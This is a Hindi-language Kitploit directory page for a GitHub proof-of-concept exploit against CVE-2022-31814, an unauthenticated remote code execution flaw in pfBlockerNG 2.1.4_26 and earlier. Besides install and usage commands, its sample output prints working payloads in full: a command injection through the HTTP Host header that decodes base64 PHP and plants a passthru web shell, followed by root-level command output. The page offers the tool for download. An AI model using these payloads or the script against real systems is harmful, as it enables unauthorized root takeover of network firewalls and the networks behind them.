Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-31814 — यह स्क्रिप्ट pfBlockerNG <= 2.1.4_26 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है जो रिमोट कोड निष्पादन की अनुमति देता है। यह एकल लक्ष्य URL या URL की सूची लेता है, कई पेलोड का उपयोग करके एक शेल अपलोड करने का प्रयास करता है, एक कमांड निष्पादित करता है, और फिर शेल को हटा देता है। | Kitploit
उपकरण/GitHubGitHub/arunhatter/cve-2022-31814
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubarunhatter/cve-2022-31814

CVE-2022-31814

यह स्क्रिप्ट pfBlockerNG <= 2.1.4_26 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है जो रिमोट कोड निष्पादन की अनुमति देता है। यह एकल लक्ष्य URL या URL की सूची लेता है, कई पेलोड का उपयोग करके एक शेल अपलोड करने का प्रयास करता है, एक कमांड निष्पादित करता है, और फिर शेल को हटा देता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-31814

अद्यतन शोषण - pfBlockerNG <= 2.1.4_26 अनधिकृत RCE (CVE-2022-31814)

विवरण

यह स्क्रिप्ट pfBlockerNG <= 2.1.4_26 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण है जो रिमोट कोड निष्पादन की अनुमति देता है। यह एक एकल लक्ष्य URL या URL की सूची लेता है, कई पेलोड का उपयोग करके एक शेल अपलोड करने का प्रयास करता है, एक कमांड निष्पादित करता है, और फिर शेल को हटा देता है।

आवश्यकताएँ

इस स्क्रिप्ट के लिए Python 3.x और request मॉड्यूल स्थापित होना आवश्यक है। आप इन मॉड्यूल को निम्न कमांड चलाकर स्थापित कर सकते हैं:

root@kitploit:~
pip3 install requests

या

root@kitploit:~
pip3 install -r requirements.txt

उपयोग

root@kitploit:~
usage: CVE-2022-31814.py [-h] --url url.txt

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help  show this help message and exit
  --file file contains multiple domains to exploit 

शोषण निष्पादन

root@kitploit:~
python3 CVE-2022-31814.py --file "urls.txt"

आउटपुट

root@kitploit:~
[+] pfBlockerNG is installed
[/] Uploading shell...
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python2 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python3 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python2 -m base64 -d | php; '"}
[+] Testing Payload: {'Host': "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKHBhc3N0aHJ1KCAkX0dFVFsiYyJdKSk7Pz4nO2Z3cml0ZSgkYSwkdCk7ZmNsb3NlKCAkYSk7Pz4='|python3.8 -m base64 -d | php; '"}
[+] Upload succeeded
# id 
uid=0(root) gid=0(wheel) groups=0(wheel)

# whoami
root

# ^C[+] Shell deleted

CVE-2022-31814

टूल डाउनलोड करें